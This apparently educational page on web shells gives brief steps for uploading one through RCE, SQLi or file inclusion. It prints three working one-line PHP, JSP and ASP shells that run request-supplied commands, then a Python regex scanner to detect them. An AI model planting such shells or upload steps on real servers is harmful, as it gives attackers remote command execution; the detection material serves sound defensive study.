Web Shell

A web shell is a malicious script or backdoor planted on a compromised web server that allows attackers to remotely execute commands, manipulate files, and maintain persistent access.

It typically looks like a harmless web page (e.g., a PHP, ASP, or JSP file) but acts as a control panel for the attacker.

How to: Web Shell

  1. Upload a file containing web shell code to a vulnerable web server through RCE, SQLi, or file inclusion (local/remote)
  2. Navigate to the shell file's location on the vulnerable web server through its URL
  3. Example web shells:

    PHP:
    <?php system($_GET['cmd']); ?>

    JSP:
    <%@ page import="java.io.*" %>
    <% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

    Classic ASP (VBScript):
    <% Response.Write(CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.ReadAll()) %>
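
All three shells above share one trait a defender can hunt for: request input passed directly into a command-execution call. The Python scanner below is an added example, not part of the original notes; the signature set, the function names, and the sample file paths are assumptions constructed for illustration, and the patterns are heuristics that only cover the .php, .jsp, and .asp extensions.

```python
import re
from pathlib import Path

# Heuristic signatures (assumed, not exhaustive): request-controlled input
# passed straight into a command-execution sink, as in the shells above.
SIGNATURES = {
    ".php": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\("
        r"[^;]*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    ".jsp": re.compile(
        r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\("
        r"[^;]*request\s*\.\s*getParameter\s*\(", re.I),
    ".asp": re.compile(
        r"WScript\.Shell[^%]*Request\s*\.\s*(?:QueryString|Form)\s*\(", re.I),
}

def scan_text(suffix, text):
    """Return the matched snippet if `text` looks like a command shell, else None."""
    sig = SIGNATURES.get(suffix.lower())
    match = sig.search(text) if sig else None
    return match.group(0) if match else None

def scan_webroot(root):
    """Walk `root` and return {relative_path: matched_snippet} for flagged files."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SIGNATURES:
            snippet = scan_text(path.suffix, path.read_text(errors="replace"))
            if snippet:
                hits[path.relative_to(root).as_posix()] = snippet
    return hits

# Constructed samples: the three shells from this page plus two benign pages.
SAMPLES = {
    "uploads/a.php": "<?php system($_GET['cmd']); ?>",
    "uploads/b.jsp": '<% Runtime.getRuntime().exec(request.getParameter  ("cmd")); %>',
    "uploads/c.asp": '<% Response.Write(CreateObject("WScript.Shell")'
                     '.Exec(Request.QueryString("cmd")).StdOut.ReadAll()) %>',
    "index.php": "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>",
    "report.jsp": '<%= request.getParameter("id") %>',
}

def demo():
    """Scan the constructed samples and return the sorted list of flagged paths."""
    return sorted(p for p, body in SAMPLES.items()
                  if scan_text(Path(p).suffix, body))

if __name__ == "__main__":
    print(demo())
```

Obfuscated shells (encoded payloads, split strings, indirect function calls) will not match these patterns, so a content scan like this is best paired with file-integrity monitoring of the web root.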
    

Why Attackers Use Web Shells